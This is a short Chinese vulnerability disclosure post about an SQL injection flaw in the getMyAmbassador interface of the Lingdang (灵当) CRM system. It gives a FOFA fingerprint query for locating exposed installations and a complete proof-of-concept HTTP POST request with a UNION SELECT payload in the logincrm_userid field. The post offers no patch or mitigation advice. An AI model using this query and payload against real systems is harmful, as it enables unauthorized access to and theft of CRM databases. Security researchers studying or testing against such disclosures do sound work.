灵当CRM系统接口getMyAmbassador存在SQL注入漏洞

0x大先生2025-01-03 15:55

灵当CRM系统接口getMyAmbassador存在SQL注入漏洞

灵当CRM系统接口getMyAmbassador存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。

fofa

javascript 复制代码 
body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")

poc

javascript 复制代码 
POST /crm/WeiXinApp/marketing/index.php?module=Ambassador&action=getMyAmbassador HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close

logincrm_userid=-1 union select user(),2,3#
相关推荐
悟能不能悟3 小时前
redis的红锁
数据库·redis·缓存
Mr_Meng_De4 小时前
AI环境下的网络安全人才的发展方向
安全·web安全
安当加密5 小时前
MySQL数据库透明加密(TDE)解决方案:基于国密SM4的合规与性能优化实践
数据库·mysql·性能优化
JH30735 小时前
第七篇:Buffer Pool 与 InnoDB 其他组件的协作
java·数据库·mysql·oracle
板凳坐着晒太阳5 小时前
ClickHouse 配置优化与问题解决
数据库·clickhouse
数据库生产实战5 小时前
解析Oracle 19C中并行INSERT SELECT的工作原理
数据库·oracle
AAA修煤气灶刘哥6 小时前
服务器指标多到“洪水泛滥”?试试InfluxDB?
数据库·后端·面试
啥都不懂的小小白7 小时前
密码学入门:从古典加密到现代网络安全
安全·web安全·密码学
阿沁QWQ7 小时前
MySQL服务器配置与管理
服务器·数据库·mysql
程序新视界8 小时前
MySQL“索引失效”的隐形杀手:隐式类型转换,你了解多少?
数据库·mysql·dba
热门推荐
01两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答02GitHub 镜像站点03UV安装并设置国内源0446个Nano-banana 精选提示词,持续更新中05Linux下V2Ray安装配置指南06智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践07GitLab 零基础入门指南:从安装到项目管理全流程08Cursor Plan Mode:AI 终于知道先想后做了09一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示10KGG转MP3工具|非KGM文件|解密音频